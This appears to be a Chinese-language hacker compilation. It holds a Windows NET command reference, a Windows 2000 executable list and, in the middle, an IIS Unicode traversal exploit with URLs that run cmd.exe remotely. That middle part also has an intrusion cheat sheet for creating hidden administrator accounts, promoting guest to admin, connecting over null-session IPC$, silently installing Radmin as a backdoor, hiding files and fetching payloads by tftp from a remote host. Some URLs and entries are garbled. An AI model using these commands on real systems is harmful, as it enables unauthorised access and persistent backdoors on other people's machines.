命令格式:net send {name | * | /domain[:name] | /users} message

参数介绍:(1)name要接收发送消息的用户名、计算机名或通信名。

(2)*将消息发送到组中所有名称。

(3)/domain[:name]将消息发送到计算机域中的所有名称。

(4)/users将消息发送到与服务器连接的所有用户。

(5)message作为消息发送的文本。

简单事例:(1)net send /users server will shutdown in 5 minutes.给所有连接到服务器的用户发送消息

(13)Net Print

作 用:显示或控制打印作业及打印队列。

命令格式:net print [computername ] job# [/hold | /release | /delete]

参数介绍:(1)computername共享打印机队列的计算机名。

(2)sharename打印队列名称。

(3)job#在打印机队列中分配给打印作业的标识号。

(4)/hold使用 job# 时,在打印机队列中使打印作业等待。

(5)/release释放保留的打印作业。

(6)/delete从打印机队列中删除打印作业。

简单事例:(1)net print YFANGSEEME列出YFANG计算机上SEEME打印机队列的目录

(14)Net Name

作 用:添加或删除消息名(有时也称别名),或显示计算机接收消息的名称列表。

命令格式:net name [name [/add | /delete]]

参数介绍:(1)键入不带参数的net name列出当前使用的名称。

(2)name指定接收消息的名称。

(3)/add将名称添加到计算机中。

(4)/delete从计算机中删除名称。

(15)Net Localgroup

作 用:添加、显示或更改本地组。

命令格式:net localgroup groupname {/add [/comment:"text "] | /delete} [/domain]

参数介绍:(1)键入不带参数的net

localgroup显示服务器名称和计算机的本地组名称。

(2)groupname要添加、扩充或删除的本地组名称。

(3)/comment: "text "为新建或现有组添加注释。

(4)/domain在当前域的主域控制器中执行操作,否则仅在本地计算机上执行操作?

(5)name [ …]列出要添加到本地组或从本地组中删除的一个或多个用户名或组名。

(6)/add将全局组名或用户名添加到本地组中。

(7)/delete从本地组中删除组名或用户名。

简单事例:(1)net localgroup love /add将名为love的本地组添加到本地用户帐号数据库

(2)net localgroup love显示love本地组中的用户

(16)Net Group

作 用:在 Windows NT Server 域中添加、显示或更改全局组。

命令格式:net group groupname {/add [/comment:"text "] | /delete} [/domain]

参数介绍:(1)键入不带参数的net group显示服务器名称及服务器的组名称。

(2)groupname要添加、扩展或删除的组。

(3)/comment:"text "为新建组或现有组添加注释。

(4)/domain在当前域的主域控制器中执行该操作,否则在本地计算机上执行操作? ?

(5)username[ …]列表显示要添加到组或从组中删除的一个或多个用户。

(6)/add添加组或在组中添加用户名。

(7)/delete删除组或从组中删除用户名。

简单事例:(1)net group love yfang1 yfang2 /add将现有用户帐号yfang1和yfang2添加到本地计算机的love组

(17)Net File

作 用:显示某服务器上所有打开的共享文件名及锁定文件数。

命令格式:net file [id [/close]]

参数介绍:(1)键入不带参数的net file获得服务器上打开文件的列表。

(2)id文件标识号。

(3)/close关闭打开的文件并释放锁定记录。

(18)Net Config

作 用:显示当前运行的可配置服务,或显示并更改某项服务的设置。

命令格式:net config [service [options]]

参数介绍:

(1)键入不带参数的net config显示可配置服务的列表。

(2)service通过net config命令进行配置的服务(server或workstation)

(3)options服务的特定选项。

(19)Net Computer

作 用:从域数据库中添加或删除计算机。

命令格式:net computer computername {/add | /del}

参数介绍:(1)computername指定要添加到域或从域中删除的计算机。

(2)/add将指定计算机添加到域。

(3)/del将指定计算机从域中删除。

简单事例:(1)net computer cc /add将计算机 cc 添加到登录域

(20)Net Accounts

作 用:更新用户帐号数据库、更改密码及所有帐号的登录要求。

命令格式:net accounts [/forcelogoff:{minutes | no}] [/minpwlen:length] [/maxpwage:{days | unlimited}] [/minpwage:days] [/uniquepw:number] [/domain]

参数介绍:(1)键入不带参数的net

accounts显示当前密码设置、登录时限及域信息。

(2)/forcelogoff:{minutes | no}设置当用户帐号或有效登录时间过期时

(3)/minpwlen:length设置用户帐号密码的最少字符数。

(4)/maxpwage:{days | unlimited}设置用户帐号密码有效的最大天数。

(5)/minpwage:days设置用户必须保持原密码的最小天数。

(6)/uniquepw:number要求用户更改密码时,必须在经过number次后才能重复使用 与之相同的密码。

(7)/domain在当前域的主域控制器上执行该操作。

(8)/sync当用于主域控制器时,该命令使域中所有备份域控制器同步

简单事例:(1)net accounts /minpwlen:7将用户帐号密码的最少字符数设置为7

----------------------上面介绍的是NET命令在WINNT下的基本用法

在WIN98中NET命令也有一些参数

其中有一些参数的名字和功能及简单的使用方法和WINNT下的相应的参数的用法相? ?

其中有(1)NET TIME命令

(1)NET PRINT命令

(1)NET USE命令

(1)NET VIEW命令

在WIN98中NET命令有一些参数

其中有一些参数的名字和WINNT下的相应的参数的名字相同但其用法却有些不同

其中有

(1)NET START

作 用:启动相应的服务。(不能在DOS-WIN中用)

命令格式:NET START [BASIC | NWREDIR | WORKSTATION | NETBIND | NETBEUI | NWLINK] [/LIST] [/YES] [/VERBOSE]

(2)NET STOP

这篇文章综合了WINDOWS 98,WINDOWS WORKSTATION和WINDOWS SERVER 三个操作系统关于NET命令的解释,希望可以全面一些

(1)NET命令是一个命令行命令。

(2)管理网络环境、服务、用户、登陆。。。。等本地信息

(3)WIN 98,WIN WORKSTATION和WIN NT都内置了NET命令。

(4)但WIN 98的NET命令和WORKSTATION、NT的NET命令不同。

(5)WORKSTATION和SERVER中的NET命令基本相同。

(6)获得HELP

(1)在NT下可以用图形的方式,开始-》帮助-》索引-》输入NET

(2)在COMMAND下可以用字符方式,NET /?或NET或NET HELP得到一些方法,相应的方法的帮助NET COMMAND /HELP或NET HELP COMMAND或NET COMMAND /? 另对于错误NET HELPMSG MESSAGE#是4位数

(7)强制参数

所有net命令接受选项/yes和/no(可缩写为/y和/n)。[简单的说就是预先给系统的提问一个答案]

(8)有一些命令是马上产生作用并永久保存的,使用的时候要慎重

(9)对于NET命令的功能都可以找到相应的图形工具的解决方案

(10)命令的组成

命令 参数 选项 | 参数 选项 | 参数 选项 |。。。。。。

罗嗦说了一大堆,其实就是6和7有用,呵呵

另有两件事:

(1)在NT的NET命令中有一些参数是只有在SERVER环境中才能使用的

(2)在WIN98的NET命令中有一些参数不能在DOS-WIN中使用,只能在DOS环境中使用

(一)系统基本知识

1.a.什么是IP:要是真的想说清楚什么是IP,那是一项很繁重的工作。简单的来说,IP就是所有Internet或是局域网上的主机的身份证。所有网络的机器连接起来后,每台机器都会有一个唯一的合法的IP地址,一台机器和别的指定的机器通讯都要依据IP来实现的。IP地址的写法为XXX.XXX.XXX.XXX。有四段数字组成,第一段数字可为1-255,后三段数字可为0-255,且所有的IP地址分为A、B、C、D、E五类,主要是A、B、C三类。其有效范围如下表所示:
类别 网络号 主机号

A 1~126 0~255 0~255 1~254
B 128~191 0~255 0~255 1~254
C 192~223 0~255 0~255 1~254
有关IP地址的问题可以查阅相关的资料,笔者在此就不再多耗笔墨了。呵呵~~~~~~~~~~~~~: p

1.b.怎样得到自己和别人的IP呢?以Windows 98为例:在“开始”—“运行”里输入:winipcfg。接着,Windows就会打开“IP 配置”。其中,在“Ethernet 适配器信息”—“IP 地址”会显示xxx.xxx.xxx.xxx,这就是你的IP。要想得到别人的IP,可以使用一些工具软件,不过最简单的使用Windows自带的一个小程序ping.exe。在MS-DOS命令行下输入ping http://www.xxx.com。会出现:
C:>ping http://www.xxx.com

Pinging http://www.xxx.com [xxx.xxx.xxx.xxx] with 32 bytes of data:

Reply from xxx.xxx.xxx.xxx: bytes=32 time=630ms TTL=116
Reply from xxx.xxx.xxx.xxx: bytes=32 time=630ms TTL=116
Reply from xxx.xxx.xxx.xxx: bytes=32 time=120ms TTL=116

Ping statistics for xxx.xxx.xxx.xxx:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 120ms, Maximum = 630ms, Average = 187ms

其中:xxx.xxx.xxx.xxx 就是 http://www.xxx.com的网络服务器的IP地址。

2.a.Unicode漏洞:“Unicode漏洞”是微软IIS的一个重大漏洞。2001年最热门漏洞之一。下面我们来简要介绍一下它的原理。
IIS 4.0和IIS 5.0在Unicode字符解码的实现中存在一个安全漏洞,导致用户可以远程通过IIS执行任意命令。当IIS打开文件时,如果该文件名包含Unicode字符,它会对其进行解码,如果用户提供一些特殊的编码,将导致IIS错误的打开或者执行某些web根目录以外的文件。攻击者可以利用这个漏洞来绕过IIS的路径检查,去执行或者打开任意的文件。此漏洞从中文IIS4.0+SP6开始,还影响中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1,台湾繁体中文也同样存在这样的漏洞。(Win NT4 编码为:%c1%9c ,Win2000 英文版 编码为:%c0%af)

假设目标主机为英文版Winodows 2k,IP为xxx.xxx.xxx.xxx,且存在Unicode漏洞,那么我们在浏览器里输入:
http://x.x.x.x/scripts/…t/system32/cmd.exe?/c+dir ,之后浏览器就会显示如下内容:
Directory of C:\inetpub\scripts
2002-02-08 15:49 〈DIR〉 .
2002-02-08 15:49 〈DIR〉 …
2002-02-08 10:20 Index.html
2002-02-08 10:20 background.jpg

从上面的测试可以看出:"http://x.x.x.x/scripts/…%c0%af…/winnt/system32/cmd.exe?/c+"后就是DOS命令了:“dir”
以此类推,我们可以利用浏览器远程执行任意命令,看下面的例子:
在浏览器里输入http://x.x.x.x/scripts/…%c0%af. … md.exe?/c+dir+md+d:\Nature,运行后我们可以看到返回这样的结果:

CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:

英文意思是:
CGI错误
具体的CGI申请有误,不能返回完整的HTTP标题,返回的标题为:
但是,你其实仍然在目标主机的 D:\ 里建立了一个名为:Nature的文件夹。

2.b.利用Unicode漏洞我们还可以简单的修改目标主机的WEB文件。一般情况下,我们要修改目标主机的web文件,常用到的方法是利用echo回显、管道工具“>” “>>”。如果你对这些命令不熟悉,可以键入以下命令以查看帮助文档,如:
C:>echo/?
显示信息,或将命令响应打开或关上。
ECHO [ON | OFF]
ECHO [message]
仅键入 ECHO 而不加参数,可以显示当前的 ECHO 设置。

管道工具“>” “>>” 的不同之处
“>”“>>”是将命令产生的输出重新定向,比如写到某个文件或输出到打印机中。
“>>”将产生的内容追加进文件中,“>”则将原文件内容覆盖。

控制面版:运行>>>>>>>>>>>:control
计算机管理:command MMC
结束进程:NET SHARE
查看版本:ver
查看中端(服务):net start
查看文件:dir
查看3389:
加用户:c:\winnt\system32>net user adminserver$ admin /add
提权限:net localgroup administrators adminserver$ /add
211.38.172.2 2180
查看用户net user
远程连接到主机CMD命令:telnet 主机IP
踢人:logoff ID
查看当前人:query user
打开telnet:net start telnet
telnet连接工具:OpenTelnet
删除共享: net share c$=c:
删除共享: net share c$ /del
启用GUEST:net user guest /active:yes
为GUEST设密码:net user guest 888888
提升到管理员:net localgroup “Administrators” guest /add

超级用户隐藏器:c:\door adminserver$:admin

克隆帐号:ca \IP 你建立的帐号 密码 肉机默认帐号 密码
ca \127.0.0.1 adminserver$ admin adminserver admin

完全禁止系统模认工享
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders{59031a47-3f72-44a7-89c5-5595fe6b30ee}]

3389替换服务-----------------------
中修改[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
c:\winnt\system32\copy termsrv.exe service.exe
c:\winnt\system32\cd…
c:\winnt\sc \127.0.0.1 config Alerter binpath= c:\winnt\system32\service.exe

端口转向:f:\web\ftp.exe “c:\fpipe.exe -v -l 开放的端口 -r 要转向的端口 ip”

使用空口令连接:
net use \对方IP\ipc$ “” /user:“administrator”
(在上传文件的目录下)远程复制文件:
c:\radmin>net use \a-01\ipc$ “12345” /user:administrator

c:\ramdin>copy r_server.exe \a-01\admin$\system32
c:\ramdin>copy radmin.reg \a-01\admin$\sytem32
在对方CMD下:
c:\winnt\system32>regedit /s radmin.reg
c:\winnt\system32>r_server.exe /install /silenec
net start r_server

copy r_server.exe \对方IP\admin$\system32
c:\opentelnet.exe \IP ADMINISTRATOR “” 0 90

copy 文件名 \IP\admin$\system32
进入对方CMD:
c:\opentelnet.exe \Ip administrator “” 0 90
登陆CMD:
c:\telnet IP 90

安装RADMIN:
c:\winnt\system32
r_server /install silence
c:\winnt\system32
r-server
导入注册表:
c:\winnt\system32\regedit.exe /s aaa.reg
看端口:
c:\winnt\system32
netstat -an
改端口:
c:\winnt\system32
r_server.exe /port:1024 /pass:1234 /save /silence
起动服务:
c:\winnt\system32\net start r_server
隐藏文件:
c:\winnt\system32\attrib.exe +h r_server.exe +h

%systemroot$\system32

看看共享开了没有,没有的话把共享开开

c:\winnt\system32>net share
清单是空的。

c:\winnt\system32>net share ipc$
命令成功完成。
c:\winnt\system32>net share admin$
命令成功完成。

注册表运行命令
regedit

查看端口:netstat-n

SA传送文件TFTP
先在本机开tftp服务 sqlexec

tftp-i IP get windxp.exe c:\windows\system32\com\windxp.exe

win2000命令集accwiz.exe > accessibility wizard for walking you through setting up your machine for your mobility needs. 辅助工具向导

acsetups.exe > acs setup dcom server executable

actmovie.exe > direct show setup tool 直接显示安装工具

append.exe > allows programs to open data in specified directories as if they were in the current directory. 允许程序打开制定目录中的数据

arp.exe > network display and modify ip - hardware addresses 显示和更改计算机的ip与硬件物理地址的对应列表

at.exe > at is a scheduling utility also included with unix 计划运行任务

atmadm.exe > displays statistics for atm call manager. atm调用管理器统计

attrib.exe > display and modify attributes for files and folders 显示和更改文件和文件夹属性

autochk.exe > used to check and repair windows file systems 检测修复文件系统

autoconv.exe > automates the file system conversion during reboots 在启动过程中自动转化系统

autofmt.exe > automates the file format process during reboots 在启动过程中格式化进程

autolfn.exe > used for formatting long file names 使用长文件名格式

bootok.exe > boot acceptance application for registry

bootvrfy.exe > bootvrfy.exe, a program included in windows 2000 that notifies the system that startup was successful. bootvrfy.exe can be run on a local or remote computer. 通报启动成功
cacls.exe > displays or modifies access control lists (acls) of files. 显示和编辑acl

calc.exe > windows calculators 计算器

cdplayer.exe > windows cd player cd播放器

change.exe > change { user | port | logon } 与终端服务器相关的查询

charmap.exe > character map 字符映射表

chglogon.exe > same as using “change logon” 启动或停用会话记录

chgport.exe > same as using “change port” 改变端口(终端服务)

chgusr.exe > same as using “change user” 改变用户(终端服务)

chkdsk.exe > check the hard disk for errors similar to scandisk 3 stages must specify a drive letter 磁盘检测程序

chkntfs.exe > same as using chkdsk but for ntfs ntfs磁盘检测程序

cidaemon.exe > component of ci filer service 组成ci文档服务

cipher.exe > displays or alters the encryption of directories [files] on ntfs partitions. 在ntfs上显示或改变加密的文件或目录

cisvc.exe > content index – it’s the content indexing service for i 索引内容

ckcnv.exe > convertor 变换

cleanmgr.exe > disk cleanup, popular with windows 98 磁盘清理

cliconfg.exe > sql server client network utility sql客户网络工具

clipbrd.exe > clipboard viewer for local will allow you to connect to other clipboards 剪贴簿查看器

clipsrv.exe > start the clipboard server 运行clipboard服务

clspack.exe > clspack used to create a file listing of system packages 建立系统文件列表清单

cluster.exe > display a cluster in a domain 显示域的集群

cmd.exe > famous command prompt 没什么好说的!

cmdl32.exe > connection manager auto-download 自动下载连接管理

cmmgr32.exe > connection manager 连接管理器

cmmon32.exe > connection manager monitor 连接管理器监视

cmstp.exe > connection manager profile manager 连接管理器配置文件安装程序

comclust.exe > about cluster server 集群

comp.exe > comclust add, remove, or join a cluster. 比较两个文件和文件集的内容*

compact.exe > displays or alters the compression of files on ntfs partitions. 显示或改变ntfs分区上文件的压缩状态

conime.exe > console ime ime控制台

control.exe > starts the control panel 控制面板

convert.exe > convert file system to ntfs 转换文件系统到ntfs

convlog.exe > converts ms iis log files 转换iis曰志文件格式到ncsa格式

cprofile.exe > copy profiles 转换显示模式

c.exe > ms windows s host version 5.1 较本宿主版本

csrss.exe > client server runtime process 客户服务器runtime进程

csvde.exe > comma separated variable import/export utility 曰至格式转换程序

dbgtrace.exe > 和terminal server相关

dcomcnfg.exe > display the current dcom configuration. dcom配置属性

dcphelp.exe > ?

dcpromo.exe > promote a domain controller to adsi ad安装向导

ddeshare.exe > display dde shares on local or remote computer dde共享

ddmprxy.exe >

debug.exe > runs debug, a program testing and editing tool. 就是debug啦!

dfrgfat.exe > defrag fat file system fat分区磁盘碎片整理程序

dfrgntfs.exe > defrag ntfs file system ntfs分区磁盘碎片整理程序

dfs_cmd_.exe > configures a dfs tree 配置一个dfs树

dfsinit.exe > distributed file system initialization 分布式文件系统初始化

dfssvc.exe > distributed file system server 分布式文件系统服务器

diantz.exe > ms cabinet maker 制作cab文件

diskperf.exe > starts physical disk performance counters 磁盘性能计数器

dllhost.exe > dllhost is used on all versions of windows 2000. dllhost is the hedost process for all com+ applications. 所有com+应用软件的主进程
dllhst3g.exe >

dmadmin.exe > disk manager service 磁盘管理服务

dmremote.exe > part of disk management 磁盘管理服务的一部分

dns.exe > dns applications dns

doskey.exe > recalls windows command lines and creates macros 命令行创建宏

dosx.exe > dos extender dos扩展

dplaysvr.exe > direct play helper 直接运行帮助

drwatson.exe > dr watson for 2000 fault detector 华生医生错误检测

drwtsn32.exe > dr watson for 2000 viewer and configuration manager 华生医生显示和配置管理

dtcsetup.exe > installs mdtc

dvdplay.exe > windows 2000 dvd player dvd播放

dxdiag.exe > direct-x diagnostics direct-x诊断工具

edlin.exe > line-oriented text editor. 命令行的文本编辑器(历史悠久啊!)
edlin.exe > line-oriented text editor. 命令行的文本编辑器(历史悠久啊!)

esentutl.exe > ms database utility ms数据库工具

eudcedit.exe > private character editor ture type造字程序

eventvwr.exe > windows 2000 event viewer 事件查看器

evnt_cmd_.exe > event to trap translator; configuration tool

evntwin.exe > event to trap translator setup

exe2bin.exe > converts exe to binary format 转换exe文件到二进制

expand.exe > expand files that have been compressed 解压缩

extrac32.exe > cab file extraction utility 解cab工具

fastopen.exe > fastopen tracks the of files on a hard disk and stores the information in memory for fast access. 快速访问在内存中的硬盘文件

faxcover.exe > fax cover page editor 传真封面编辑

faxqueue.exe > display fax queue 显示传真队列

faxsend.exe > fax wizard for sending faxes 发送传真向导

faxsvc.exe > starts fax server 启动传真服务

fc.exe > compares two files or sets of files and their differences 比较两个文件的不同

find.exe > searches for a text string in file or files 查找文件中的文本行

findstr.exe > searches for strings in files 查找文件中的行

finger.exe > fingers a user and displays statistics on that user finger一个用户并显示出统计结果

fixmapi.exe > fix mapi files 修复mapi文件

flattemp.exe > enable or disable temporally directories 允许或者禁用临时文件目录

fontview.exe > display fonts in a font file 显示字体文件中的字体

forcedos.exe > forces a file to start in dos mode. 强制文件在dos模式下运行

freecell.exe > popular windows game 空当接龙

ftp.exe > file transfer protocol used to transfer files over a network connection 就是ftp了

gdi.exe > graphic device interface 图形界面驱动

grovel.exe >

grpconv.exe > program manager group convertor 转换程序管理员组

help.exe > displays help for windows 2000 commands 显示帮助

hostname.exe > display hostname for machine. 显示机器的hostname

ie4uinit.exe > ie5 user install tool ie5用户安装工具

ieshwiz.exe > customize folder wizard 自定义文件夹向导

iexpress.exe > create and setup packages for install 穿件安装包

iisreset.exe > restart iis admin service 重启iis服务

internat.exe > keyboard language indicator applet 键盘语言指示器

ipconfig.exe > windows 2000 ip configuration. 察看ip配置

ipsecmon.exe > ip security monitor ip安全监视器

ipxroute.exe > ipx routing and source routing control program ipx路由和源路由控制程序

irftp.exe > setup ftp for wireless communication 无线连接

ismserv.exe > intersite messaging service 安装或者删除service control manager中的服务

jdbgmgr.exe > microsoft debugger for 4的调试器

jetconv.exe > convert a jet engine database 转换jet engine数据库

jetpack.exe > compact jet database. 压缩jet数据库

jview.exe > command-line loader for 的命令行装载者

krnl386.exe > core component for windows 2000 2000的核心组件

label.exe > change label for drives 改变驱动器的卷标

lcwiz.exe > license compliance wizard for local or remote systems. 许可证符合向导

ldifde.exe > ldif cmd line manager ldif目录交换命令行管理

licmgr.exe > terminal server license manager 终端服务许可协议管理

lights.exe > display connection status lights 显示连接状况

llsmgr.exe > windows 2000 license manager 2000许可协议管理

llssrv.exe > start the license server 启动许可协议服务器

lnkstub.exe >

locator.exe > rpc locator 远程定位

lodctr.exe > load perfmon counters 调用性能计数

logoff.exe > log current user off. 注销用户

lpq.exe > displays status of a remote lpd queue 显示远端的lpd打印队列的状态,显示被送到基于unix的服务器的打印任务

lpr.exe > send a print job to a network printer. 重定向打印任务到网络中的打印机。通常用于unix客户打印机将打印任务发送给连接了打印设备的nt的打印机服务器。

lsass.exe > lsa executable and server dll 运行lsa和server的dll

lserver.exe > specifies the new dns domain for the default server 指定默认server新的dns域

macfile.exe > used for managing macfiles 管理macfiles

magnify.exe > used to magnify the current screen 放大镜

makecab.exe > ms cabinet maker 制作cab文件

mdm.exe > machine debug manager 机器调试管理

mem.exe > display current memory stats 显示内存状态

migpwd.exe > migrate passwords. 迁移密码

mmc.exe > microsoft management console 控制台

mnmsrvc.exe > netmeeting remote desktop sharing netmeeting远程桌面共享

mobsync.exe > manage synchronization. 同步目录管理器

mountvol.exe > creates, s, or lists a volume mount point. 创建、删除或列出卷的装入点。

mplay32.exe > ms media player 媒体播放器
mpnotify.exe > multiple provider notification application 多提供者通知应用程序

mq1sync.exe >

mqbkup.exe > ms message queue backup and restore utility 信息队列备份和恢复工具

mqexchng.exe > msmq exchange connector setup 信息队列交换连接设置

mqmig.exe > msmq migration utility 信息队列迁移工具

mqsvc.exe > ?

mrinfo.exe > multicast routing using snmp 使用snmp多点传送路由

mscdexnt.exe > installs mscd (ms cd extensions) 安装mscd

msdtc.exe > dynamic transaction controller console 动态事务处理控制台

msg.exe > send a message to a user local or remote. 发送消息到本地或远程客户

mshta.exe > html application host html应用程序主机

msiexec.exe > starts windows installer program 开始windows安装程序

mspaint.exe > microsoft paint 画板

msswchx.exe >

mstask.exe > task schedule program 任务计划表程序

mstinit.exe > task scheduler setup 任务计划表安装

narrator.exe > program will allow you to have a narrator for reading. microsoft讲述人

nbtstat.exe > displays protocol stats and current tcp/ip connections using nbt 使用 nbt(tcp/ip 上的 netbios)显示协议统计和当前 tcp/ip 连接。

nddeapir.exe > ndde api server side ndde api服务器端

net.exe > net utility 详细用法看/?

net1.exe > net utility d version from ms net的升级版

netdde.exe > network dde will install itself into the background 安装自己到后台

netsh.exe > creates a shell for network information 用于配置和监控 windows 2000 命令行脚本接口。

netstat.exe > displays current connections. 显示协议统计和当前的 tcp/ip 网络连接。
nlsfunc.exe > loads country-specific information 加载特定国家(地区)的信息。windows 2000 和 ms-dos 子系统不使用该命令。接受该命令只是为了与 ms-dos 文件兼容。

notepad.exe > opens windows 2000 notepad 记事本

nslookup.exe > displays information for dns 该诊断工具显示来自域名系统 (dns) 名称服务器的信息。

ntbackup.exe > opens the nt backup utility 备份和故障修复工具

ntbooks.exe > starts windows help utility 帮助

ntdsutil.exe > performs db maintenance of the adsi 完成adsi的db的维护

ntfrs.exe > nt file replication service nt文件复制服务

ntfrsupg.exe >

ntkrnlpa.exe > kernel patch 核心补丁

ntoskrnl.exe > core nt kernel kt的核心

ntsd.exe >

ntvdm.exe > simulates a 16-bit windows environment 模拟16位windows环境

nw16.exe > netware redirector netware转向器

nw.exe > runs netware s 运行netware脚本

odbcad32.exe > odbc 32-bit administrator 32位odbc管理

odbcconf.exe > configure odbc driver’s and data source’s from command line 命令行配置odbc驱动和数据源

os2.exe > an os/2 warp server (os2 /o) os/2

os2srv.exe > an os/2 warp server os/2

os2ss.exe > an os/2 warp server os/2

osk.exe > on screen keyboard 屏幕键盘

packager.exe > windows 2000 packager manager 对象包装程序

pathping.exe > combination of ping and tracert 包含ping和tracert的程序

pax.exe > is a posix program and path names used as arguments must be specified in posix format. use “//c/users/default” instead of “c:usersdefault.” 启动便携式存档互换 (pax) 实用程序

pentnt.exe > used to check the pentium for the floating point division error. 检查pentium的浮点错误

perfmon.exe > starts windows performance monitor 性能监视器

ping.exe > packet internet groper 验证与远程计算机的连接

posix.exe > used for backward compatibility with unix 用于兼容unix

print.exe > cmd line used to print files 打印文本文件或显示打印队列的内容。

progman.exe > program manager 程序管理器

proquota.exe > profile quota program

psxss.exe > posix subsystem application posix子系统应用程序

qappsrv.exe > displays the available application terminal servers on the network
在网络上显示终端服务器可用的程序

qprocess.exe > display information about processes local or remote 在本地或远程显示进程的信息(需终端服务)

query.exe > query termserver user process and sessions 查询进程和对话

quser.exe > display information about a user logged on 显示用户登陆的信息(需终端服务)

qwinsta.exe > display information about terminal sessions. 显示终端服务的信息

rasadmin.exe > start the remote access admin service 启动远程访问服务

rasautou.exe > creates a ras connection 建立一个ras连接

rasdial.exe > dial a connection 拨号连接

rasphone.exe > starts a ras connection 运行ras连接

rcp.exe > copies a file from and to a rcp service. 在 windows 2000 计算机和运行远程外壳端口监控程序 rshd 的系统之间复制文件

rdpclip.exe > rdpclip allows you to copy and paste files between a terminal session and client console session. 再终端和本地复制和粘贴文件

recover.exe > recovers readable information from a bad or defective disk 从坏的或有缺陷的磁盘中恢复可读取的信息。

redir.exe > starts the redirector service 运行重定向服务

regedt32.exe > 32-bit register service 32位注册服务

regini.exe > modify registry permissions from within a 用脚本修改注册许可

register.exe > register a program so it can have special execution characteristics. 注册包含特殊运行字符的程序

regsvc.exe >

regsvr32.exe > registers and unregister’s dll’s. as to how and where it register’s them i dont know. 注册和反注册dll

regtrace.exe > options to tune debug options for applications failing to dump trace statements
trace 设置
regwiz.exe > registration wizard 注册向导

remrras.exe >

replace.exe > replace files 用源目录中的同名文件替换目标目录中的文件。

reset.exe > reset an active section 重置活动部分

rexec.exe > runs commands on remote hosts running the rexec service. 在运行 rexec 服务的远程计算机上运行命令。rexec 命令在执行指定命令前,验证远程计算机上的用户名,只有安装了 tcp/ip 协议后才可以使用该命令。

risetup.exe > starts the remote installation service wizard. 运行远程安装向导服务

route.exe > display or edit the current routing tables. 控制网络路由表

routemon.exe > no longer supported 不再支持了!

router.exe > router software that runs either on a dedicated dos or on an os/2 system. route软件在 dos或者是os/2系统

rsh.exe > runs commands on remote hosts running the rsh service 在运行 rsh 服务的远程计算机上运行命令

rsm.exe > mounts and configures remote system media 配置远程系统媒体

rsnotify.exe > remote storage notification recall 远程存储通知回显

rsvp.exe > resource reservation protocol 源预约协议

runas.exe > run a program as another user 允许用户用其他权限运行指定的工具和程序

rundll32.exe > launches a 32-bit dll program 启动32位dll程序

runonce.exe > causes a program to run during startup 运行程序再开始菜单中

rwinsta.exe > reset the session subsystem hardware and software to known initial values 重置会话子系统硬件和软件到最初的值

savedump.exe > does not write to e:winntuser.dmp 不写入user.dmp中

scardsvr.exe > smart card resource management server 子能卡资源管理服务器

schupgr.exe > it will read the schema files (.ldf files) and upgrade the schema. (part of adsi) 读取计划更新文件和更新计划

secedit.exe > starts security editor help 自动安全性配置管理

services.exe > controls all the services 控制所有服务

sethc.exe > set high contrast - changes colours and display mode logoff to set it back to normal 设置高对比

setreg.exe > shows the software publishing state key values 显示软件发布的国家语言

setup.exe > gui box prompts you to goto control panel to configure system components 安装程序(转到控制面板)

setver.exe > set version for files 设置 ms-dos 子系统向程序报告的 ms-dos 版本号

sfc.exe > system file checker test and check system files for integrity 系统文件检查

sfmprint.exe > print services for macintosh 打印macintosh服务

sfmpsexe.exe >

sfmsvc.exe >

shadow.exe > monitor another terminal services session. 监控另外一台中端服务器会话

share.exe > windows 2000 和 ms-dos 子系统不使用该命令。接受该命令只是为了与 ms-dos 文件兼容

shmgrate.exe >

shrpubw.exe > create and share folders 建立和共享文件夹

sigverif.exe > file signature verification 文件签名验证

skeys.exe > serial keys utility 序列号制作工具

smlogsvc.exe > performance logs and alerts 性能曰志和警报
smss.exe >

sndrec32.exe > starts the windows sound recorder 录音机

sndvol32.exe > display the current volume information 显示声音控制信息

snmp.exe > simple network management protocol used for network mangement 简单网络管理协议

snmptrap.exe > utility used with snmp snmp工具

sol.exe > windows solitaire game 纸牌

sort.exe > compares files and folders 读取输入、排序数据并将结果写到屏幕、文件和其他设备上

spoolsv.exe > part of the spooler service for printing 打印池服务的一部分

sprestrt.exe >

srvmgr.exe > starts the windows server manager 服务器管理器

stimon.exe > wdm stillimage- > monitor

stisvc.exe > wdm stillimage- > service

subst.exe > associates a path with a drive letter 将路径与驱动器盘符关联

svchost.exe > svchost.exe is a generic host process name for services that are run from dynamic-link libraries (dlls). dll得主进程

syncapp.exe > creates windows briefcase. 创建windows文件包

sysedit.exe > opens editor for 4 system files 系统配置编辑器

syskey.exe > encrypt and secure system database nt账号数据库按群工具

sysocmgr.exe > windows 2000 setup 2000安装程序

systray.exe > starts the systray in the lower right corner. 在低权限运行systray

taskman.exe > task manager 任务管理器

taskmgr.exe > starts the windows 2000 task manager 任务管理器

tcmsetup.exe > telephony client wizard 电话服务客户安装

tcpsvcs.exe > tcp services tcp服务

.exe > telnet utility used to connect to telnet server

termsrv.exe > terminal server 终端服务

tftp.exe > trivial ftp 将文件传输到正在运行 tftp 服务的远程计算机或从正在运行 tftp 服务的远程计算机传输文件

tftpd.exe > trivial ftp daemon

themes.exe > change windows themes 桌面主题

tlntadmn.exe > telnet server administrator telnet服务管理

tlntsess.exe > display the current telnet sessions 显示目前的telnet会话

tlntsvr.exe > start the telnet server 开始telnet服务

tracert.exe > trace a route to display paths 该诊断实用程序将包含不同生存时间 (ttl) 值的 internet 控制消息协议 (icmp) 回显数据包发送到目标,以决定到达目标采用的路由

tsadmin.exe > terminal server administrator 终端服务管理器

tscon.exe > attaches a user session to a terminal session. 粘贴用户会话到终端对话

tsdiscon.exe > disconnect a user from a terminal session 断开终端服务的用户

tskill.exe > kill a terminal server process 杀掉终端服务

tsprof.exe > used with terminal server to query results. 用终端服务得出查询结果

tsshutdn.exe > shutdown the system 关闭系统

unlodctr.exe > part of performance monitoring 性能监视器的一部分

upg351db.exe > upgrade a jet database 升级jet数据库

ups.exe > ups service ups服务

user.exe > core windows service windows核心服务

userinit.exe > part of the winlogon process winlogon进程的一部分

usrmgr.exe > start the windows user manager for domains 域用户管理器

utilman.exe > this tool enables an administrator to designate which computers automatically open accessibility tools when windows 2000 starts. 指定2000启动时自动打开那台机器

verifier.exe > driver verifier manager driver verifier manager

vwipxspx.exe > loads ipx/spx vdm 调用ipx/spx vdm

